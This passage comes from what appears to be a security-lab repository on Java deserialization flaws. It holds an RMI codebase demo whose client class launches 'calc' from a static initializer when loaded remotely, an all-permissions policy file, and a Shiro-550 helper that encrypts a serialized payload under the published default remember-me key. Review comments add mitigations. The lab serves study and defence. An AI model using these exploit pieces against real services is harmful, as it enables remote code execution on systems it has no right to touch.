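 * <p>Review note: the argument of {@link #sum(List)} reaches this object from
 * a remote caller and is declared as the open interface {@code List}, so the
 * declaration itself does not constrain the concrete class or the elements.
 * A service that is not a lab should limit what it deserializes (a
 * serialization filter, and {@code java.rmi.server.useCodebaseOnly} left at
 * its default of {@code true}) and should validate the elements, as done
 * below.
 */
public class Calc extends UnicastRemoteObject implements ICalc {
    /**
     * Exports the object via the superclass constructor.
     *
     * @throws RemoteException if the export fails
     */
    public Calc() throws RemoteException {}

    /**
     * Adds up the elements of {@code params}.
     *
     * <p>The parameter stays a raw {@code List} so that the method still
     * implements {@code ICalc.sum(List)} as listed. The listing iterated the
     * raw list as {@code Integer}, which does not compile (the generic
     * parameter was presumably lost), so the elements are read as
     * {@code Object} and checked one by one.
     *
     * @param params the values to add; each element must be an {@code Integer}
     * @return the sum of all elements, {@code 0} for an empty list
     * @throws IllegalArgumentException if an element is {@code null} or not an
     *                                  {@code Integer}
     * @throws RemoteException declared by the remote interface
     */
    @Override
    public Integer sum(List params) throws RemoteException {
        int total = 0;
        for (Object param : params) {
            if (!(param instanceof Integer)) {
                throw new IllegalArgumentException("sum() accepts Integer elements only");
            }
            total += (Integer) param;
        }
        return total;
    }
}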
--------------------------------------------------------------------------------
/RMI_Codebase/src/ICalc.java:
--------------------------------------------------------------------------------
1 | import java.rmi.Remote;
2 | import java.rmi.RemoteException;
3 | import java.util.List;
/**
 * Remote contract of the demo calculator service.
 *
 * <p>Review note: {@code params} is a raw {@code List}, so the signature does
 * not constrain the concrete list class or its element type. An
 * implementation has to validate what it receives.
 */
public interface ICalc extends Remote {
    /**
     * Sums the values in {@code params}.
     *
     * @param params the values to add
     * @return the sum
     * @throws RemoteException if the remote call fails
     */
    Integer sum(List params) throws RemoteException;
}
--------------------------------------------------------------------------------
/RMI_Codebase/src/RMIClient.java:
--------------------------------------------------------------------------------
1 | import java.rmi.Naming;
2 | import java.util.List;
3 | import java.util.ArrayList;
4 | import java.io.Serializable;
/**
 * Client half of the RMI codebase lab: looks up the remote calculator on the
 * loopback registry and calls it with a list whose class exists only on the
 * client.
 *
 * <p>Review notes, from the defender's side:
 * <ul>
 *   <li>The static initializer starts {@code calc} in whichever JVM
 *       initializes this class. It is the marker that shows where the class
 *       ended up being loaded.</li>
 *   <li>{@link Payload} is a non-static inner class, so each instance refers
 *       to its enclosing {@code RMIClient}, which is {@code Serializable}.
 *       NOTE(review): sending a {@code Payload} presumably makes the receiver
 *       resolve both classes - confirm against the accompanying write-up.</li>
 *   <li>Mitigation on a real service: leave
 *       {@code java.rmi.server.useCodebaseOnly} at its default of
 *       {@code true}, never run with an all-permissions policy, and filter
 *       incoming serialized types.</li>
 * </ul>
 */
public class RMIClient implements Serializable {

    private static final long serialVersionUID = 1L;

    // Runs once at class initialization; any failure is only printed.
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    /** List subclass defined only in this client; kept raw and non-static as in the listing. */
    public class Payload extends ArrayList {
    }

    /**
     * Installs a {@link SecurityManager} if none is set, looks up
     * {@code refObj} on {@code 127.0.0.1:1099}, sends a {@link Payload}
     * holding 3 and 4 to the remote {@code sum} and prints the reply.
     *
     * @throws Exception if the lookup or the remote call fails
     */
    public void lookup() throws Exception {
        boolean managerMissing = System.getSecurityManager() == null;
        if (managerMissing) {
            System.out.println("setup SecurityManager");
            System.setSecurityManager(new SecurityManager());
        }

        Object stub = Naming.lookup("rmi://127.0.0.1:1099/refObj");
        ICalc remoteCalc = (ICalc) stub;

        List operands = new Payload();
        operands.add(3);
        operands.add(4);

        Integer answer = remoteCalc.sum(operands);
        System.out.println(answer);
    }

    /**
     * Entry point: runs a single lookup.
     *
     * @param args unused
     * @throws Exception propagated from {@link #lookup()}
     */
    public static void main(String[] args) throws Exception {
        RMIClient client = new RMIClient();
        client.lookup();
    }
}
--------------------------------------------------------------------------------
/RMI_Codebase/src/RemoteRMIServer.java:
--------------------------------------------------------------------------------
1 | import java.rmi.Naming;
2 | import java.rmi.registry.LocateRegistry;
3 |
/**
 * Server half of the RMI codebase lab: creates a registry on port 1099 and
 * binds one {@code Calc} instance under the name {@code refObj}.
 *
 * <p>Review note: a {@link SecurityManager} is installed when none is set.
 * The {@code client.policy} file shown alongside this class grants
 * {@code AllPermission}; if that is the policy in effect, the manager
 * restricts nothing. Treat this setup as a lab configuration only.
 */
public class RemoteRMIServer {
    /**
     * Installs the security manager if needed, then exports and binds the
     * calculator.
     *
     * @throws Exception if the export, the registry creation or the bind fails
     */
    private void start() throws Exception {
        if (null == System.getSecurityManager()) {
            System.out.println("setup SecurityManager");
            System.setSecurityManager(new SecurityManager());
        }

        // Order kept from the original: the service object is created first,
        // then the registry, then the binding.
        final Calc calcService = new Calc();
        final int registryPort = 1099;
        LocateRegistry.createRegistry(registryPort);
        Naming.rebind("refObj", calcService);
    }

    /**
     * Entry point: starts the server.
     *
     * @param args unused
     * @throws Exception propagated from {@code start()}
     */
    public static void main(String[] args) throws Exception {
        RemoteRMIServer server = new RemoteRMIServer();
        server.start();
    }
}
--------------------------------------------------------------------------------
/RMI_Codebase/src/client.policy:
--------------------------------------------------------------------------------
// Unscoped grant (no codeBase, no signedBy): every permission goes to all code.
// A SecurityManager running under this policy restricts nothing. Lab use only.
// NOTE(review): presumably passed to the demo JVMs via -Djava.security.policy - confirm.
1 | grant {
2 | permission java.security.AllPermission;
3 | };
--------------------------------------------------------------------------------
/URLDNS/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /../../../../../../:\gitRepo\webSecurity\deserilize\URLDNS\.idea/dataSources/
6 | /dataSources.local.xml
7 | # Editor-based HTTP Client requests
8 | /httpRequests/
9 |
--------------------------------------------------------------------------------
/URLDNS/.idea/misc.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/URLDNS/.idea/modules.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/URLDNS/.idea/vcs.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/URLDNS/URLDNS.iml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/URLDNS/out.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/URLDNS/out.bin
--------------------------------------------------------------------------------
/URLDNS/out/production/URLDNS/URLDNS.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/URLDNS/out/production/URLDNS/URLDNS.class
--------------------------------------------------------------------------------
/URLDNS/src/URLDNS.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/URLDNS/src/URLDNS.java
--------------------------------------------------------------------------------
/shiro550/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /../../../../../../:\gitRepo\webSecurity\deserilize\shiro550\.idea/dataSources/
6 | /dataSources.local.xml
7 | # Editor-based HTTP Client requests
8 | /httpRequests/
9 |
--------------------------------------------------------------------------------
/shiro550/.idea/misc.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/shiro550/.idea/modules.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/shiro550/.idea/vcs.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/shiro550/out/production/shiro550/shiro550.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/shiro550/out/production/shiro550/shiro550.class
--------------------------------------------------------------------------------
/shiro550/shiro550.iml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/shiro550/src/shiro550.java:
--------------------------------------------------------------------------------
1 | import org.apache.shiro.codec.Base64;
2 | import org.apache.shiro.crypto.AesCipherService;
3 | import org.apache.shiro.util.ByteSource;
4 |
5 | import java.io.ByteArrayOutputStream;
6 | import java.io.FileInputStream;
7 | import java.io.IOException;
8 |
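/**
 * Lab helper for the Shiro-550 notes: reads a serialized blob from
 * {@code 1.ser}, encrypts it with Shiro's {@code AesCipherService} under a
 * key hard-coded in the source, and prints the result.
 *
 * <p>Review note: the whole demonstration depends on the encryption key being
 * publicly known. A deployment whose remember-me key matches a published
 * value should be treated as exposed: configure a unique, randomly generated
 * key and keep Shiro up to date.
 */
public class shiro550 {
    /**
     * Encrypts the content of {@code 1.ser} and prints the string form of the
     * ciphertext.
     *
     * @param args unused
     * @throws IOException if {@code 1.ser} cannot be read
     */
    public static void main(String[] args) throws IOException {
        // The name suggests this is a framework default key - presumably the
        // legacy Shiro one; verify against the Shiro release under test.
        byte[] DEFAULT_CIPHER_KEY_BYTES = Base64.decode("kPH+bIxk5D2deZiIxcaaaA==");

        AesCipherService aesCipherService = new AesCipherService();
        byte[] serializedBlob = getSerializedObj();

        ByteSource finalsource = aesCipherService.encrypt(serializedBlob, DEFAULT_CIPHER_KEY_BYTES);
        System.out.println(finalsource.toString());
    }

    /**
     * Reads the whole of {@code 1.ser} from the working directory.
     *
     * <p>The stream is opened in try-with-resources so that it is closed even
     * when a read fails (the original never closed it), and the file is read
     * in chunks rather than one byte per call.
     *
     * @return the file content
     * @throws IOException if the file is missing or cannot be read
     */
    public static byte[] getSerializedObj() throws IOException {
        ByteArrayOutputStream collected = new ByteArrayOutputStream();
        try (FileInputStream in = new FileInputStream("1.ser")) {
            byte[] chunk = new byte[8192];
            int read;
            while ((read = in.read(chunk)) != -1) {
                collected.write(chunk, 0, read);
            }
        }
        return collected.toByteArray();
    }
}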
33 |
--------------------------------------------------------------------------------